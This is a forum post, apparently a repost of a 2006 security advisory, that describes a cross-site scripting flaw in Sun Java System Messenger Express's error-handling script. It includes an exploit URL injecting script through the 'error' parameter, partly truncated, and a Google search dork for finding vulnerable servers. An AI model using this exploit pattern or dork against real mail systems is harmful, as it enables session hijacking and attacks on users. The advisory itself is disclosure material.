• XSS.stack #1 – первый литературный журнал от юзеров форума

Sun java System Messenger Express

FlatL1ne

RAM
Пользователь
Регистрация
17.08.2006
Сообщения
139
Реакции
3
Пожалуйста, обратите внимание, что пользователь заблокирован
Sun java System Messenger Express
remote XSS vulnerabilities
By: Handrix <handrix_at_morx_org>
29 November 2006
MorX security research team
www.morx.org

Description:
Sun java System Messenger Express XSS

The index script is vulnerable to XSS attacks, in functiion errorHTML .

function errorHTML() {
var s=''
.
.
.

document.write(s) ---> Need more case filetring the 's' var
}


So, this issue can allow an attacker to bypass content filters and
potentially carry out cross-site scripting, HTML injection and other
attacks.

Exploit:
https://mail.victime.edu/?user=&error=%3Csc...);%3C/script%3E

Founded with Google by this dorks :
intitle:"Sun Java™ System Messenger Express"

Vulnerable versions :
Sun java System Messenger Express
Sun java System Messenger Express6
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх